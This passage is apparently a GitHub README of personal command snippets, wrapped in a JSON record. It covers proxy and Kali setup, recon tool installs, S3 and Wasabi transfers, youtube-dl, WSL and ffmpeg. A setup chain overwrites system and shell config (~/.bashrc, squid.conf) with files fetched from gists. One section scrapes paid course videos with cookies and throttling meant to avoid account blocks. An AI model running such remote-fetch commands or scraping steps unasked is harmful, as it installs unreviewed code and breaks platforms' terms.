https://gist.githubusercontent.com/Anon-Exploiter/c4e96ada91771bc9ee934cf1f297fad5/raw/0a219fd41f075e0b848bd46c0910ccc55aca9f06/squid.conf -O /etc/squid/squid.conf \u0026\u0026 \\\n    echo \"Please enter proxy password: \" \u0026\u0026 \\\n    sudo htpasswd -c /etc/squid/.htpasswd proxy \u0026\u0026 \\\n    sudo systemctl restart squid \u0026\u0026 \\\n    sudo service squid status \u0026\u0026 \\\n    cd \u0026\u0026 \\\n    wget https://gist.githubusercontent.com/Anon-Exploiter/15bca8962609da3a88c8ee96e49f0bd0/raw/71028ffdfc6f04b88d7463fdf8b208a7bda57894/.bashrc -O ~/.bashrc \u0026\u0026 \\\n    wget https://gist.githubusercontent.com/Anon-Exploiter/261d377c51fbec1798b5913044c213fe/raw/2ce311d67414805230c3aa23f78bdf1b4d731212/.tmux.conf -O ~/.tmux.conf \u0026\u0026 \\\n    cd \u0026\u0026 \\\n    wget \"https://github.com/OJ/gobuster/releases/download/v3.1.0/gobuster-linux-amd64.7z\" -O gobuster-linux-amd64.7z \u0026\u0026 \\\n    7z x gobuster-linux-amd64.7z \u0026\u0026 \\\n    sudo mv gobuster-linux-amd64/* /usr/bin/ \u0026\u0026 \\\n    sudo chmod +x /usr/bin/gobuster \u0026\u0026 \\\n    rm -rfv gobuster* \u0026\u0026 \\\n    cd \u0026\u0026 \\\n    git clone https://github.com/maurosoria/dirsearch \u0026\u0026 \\\n    cd\n```\n\n\n\n#### ZSH functions for starting and shutting down CS:GO Server\n\n```powershell\nstartCsgoServer() {\n    aws ec2 start-instances --instance-ids i-045e932beb160a0b6 --profile csgo-server\n    sleep 20\n    bash /home/umar_0x01/ec2/csgo-server.sh \"pwd; tmux new -d -s bruh; tmux send-keys -t bruh.0 'bash startcsgo.sh' ENTER\"\n}\n\nstopCSGOServer() {\n    bash /home/umar_0x01/ec2/csgo-server.sh \"pwd; tmux send-keys -t bruh.0 'exit' ENTER\"\n    sleep 3\n    aws ec2 stop-instances --instance-ids i-045e932beb160a0b6 --profile csgo-server\n}\n```\n\n\n#### Turning Debian Instance on Kali\n\n```powershell\nsudo apt-get -y update \u0026\u0026 \\\n    sudo apt-get install -y dirmngr --install-recommends \u0026\u0026 \\\n    echo \"deb http://http.kali.org/kali kali-rolling main non-free contrib\" | sudo tee /etc/apt/sources.list \u0026\u0026 \\\n    sudo apt-key adv --keyserver hkp://keys.gnupg.net:80 --recv-keys ED444FF07D8D0BF6 \u0026\u0026 \\\n    sudo apt-get -y update \u0026\u0026 \\\n    sudo apt-get install -y python3 \u0026\u0026 \\\n    sudo apt-get -y upgrade \u0026\u0026 \\\n    sudo apt-get -y install kali-linux-default\n```\n\n\n\n#### Speeding up AWS S3 bucket downloading\n\n```powershell\naws configure set default.s3.max_concurrent_requests 50\naws s3 cp s3://my-bucket . --recursive --endpoint-url=https://s3.wasabisys.com --no-sign-request\naws s3 cp \"s3://my-bucket/my-data/\" . --recursive --endpoint-url=https://s3.wasabisys.com\n```\n\n\n#### Using s4cmd for syncing s3 bucket\n\n```powershell\ns4cmd --endpoint-url https://s3.wasabisys.com sync s3://my-bucket/my-folder . \n```\n\n\n\n#### Uploading files on Wasabi\n\n```powershell\naws s3 cp file.jar s3://bucket/ --endpoint-url=https://s3.wasabisys.com --no-sign-request\naws s3 cp mfolder/ s3://bucket/ --endpoint-url=https://s3.wasabisys.com --recursive --no-sign-request\n```\n\n\n\n#### Wasabi - Region based BS resolution\n\n```powershell\naws s3 ls --endpoint-url=https://s3.ap-southeast-2.wasabisys.com s3://bucket/\n```\n\n\n\n#### Installing ffmpeg in heroku application\n\n```powershell\nheroku buildpacks:add --index 1 https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git\n```\n\n\n\n### Downloading/Uploading Stuff\n\n#### Downloading folder using gdl / googledrive downloader / google drive downloader\n\n```powershell\ngdl --oauth -p 50 -R 10 -aria --aria-flags '-s 10 -j 10 -x 16' https://drive.google.com/drive/u/3/folders/folder_id\ngdl -p 50 -R 10 -aria --aria-flags '-s 10 -j 10 -x 16' https://drive.google.com/file/d/folder_id/view\n```\n\n\n\n#### Uploading using gdl\n\n```powershell\ngupload files/ -p 10 -R 5 -v\n```\n\n\n\n#### Uploading using rclone\n\n```powershell\n./rclone copy --update --verbose --transfers 10 --checkers 4 --contimeout 60s --timeout 300s --retries 3 --low-level-retries 10 --stats 5s \"ine\" \"gdrive:my-folder\" --ignore-existing\n```\n\n\n\n#### Multiple URLs download using youtube-dl and xargs\n\n```powershell\ncat files.txt | xargs -n 1 -P 4 youtube-dl\n```\n\n\n#### Downloading videos from teachable.io / teachable / tcm / tcmacademy\n\n```powershell\n# academy.tcm-sec.com\nyoutube-dl --cookies ~/cookies.txt -o \"./%(chapter_number)02d - %(chapter)s/%(autonumber)03d-%(title)s.mp4\" https://academy.tcm-sec.com/courses/enrolled/1221729 --external-downloader \"aria2c\" --external-downloader-args \"-s 10 -j 10 -x 16 --file-allocation=none -c\" -c\n\n# pluralsight - this can block account\nyoutube-dl --cookies ~/Downloads/pluralsight.com_cookies.txt -o \"%(playlist)s/%(chapter_number)02d - %(chapter)s/%(playlist_index)02d - %(title)s.%(ext)s\" --min-sleep-interval 150 --max-sleep-interval 300 --sub-lang en --sub-format srt --write-sub -vvv https://app.pluralsight.com/library/courses/csslp-secure-software-design/\n```\n\n\n#### Youtube-dl downloading youtube channel playlist with aria2c\n\n```powershell\nyoutube-dl -o \"./%(autonumber)03d-%(title)s.mp4\" --external-downloader \"aria2c\" --external-downloader-args \"-s 10 -j 10 -x 16 --file-allocation=none -c\" -c -f mp4 https://www.youtube.com/playlist?list=playlist_id\n```\n\n\n\n\n\n\n### Windows\n\n#### Cleaning WSL2 storage after deletion of files (Home edition)\n\n```powershell\nwsl --shutdown\ndiskpart\n\nselect vdisk file=\"C:\\Users\\Syed Umar Arfeen\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu20.04onWindows_79rhkp1fndgsc\\LocalState\\ext4.vhdx\"\nattach vdisk readonly\n\ncompact vdisk\ndetach vdisk\nexit\n```\n\n\n\n### Generic Commands\n\n#### ffmpeg\n\n```powershell\n# Using ffmpeg to lessen the filesize of a video\nffmpeg -i poc.mp4 -vcodec libx264 -x264-params keyint=300:scenecut=0 out4.mp4\n\n\n# For decreasing the total frames\nffmpeg -i poc.mp4 -vcodec libx264 -x264-params keyint=300:scenecut=0 -filter:v fps=fps=10 out3.mp4\n\n\n# For clipping the video from start to 01:30\nffmpeg -i file.mp4 -t \"00:01:30\" -c copy file2.mp4\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanon-exploiter%2Fcode-snippets","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fanon-exploiter%2Fcode-snippets","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanon-exploiter%2Fcode-snippets/lists"}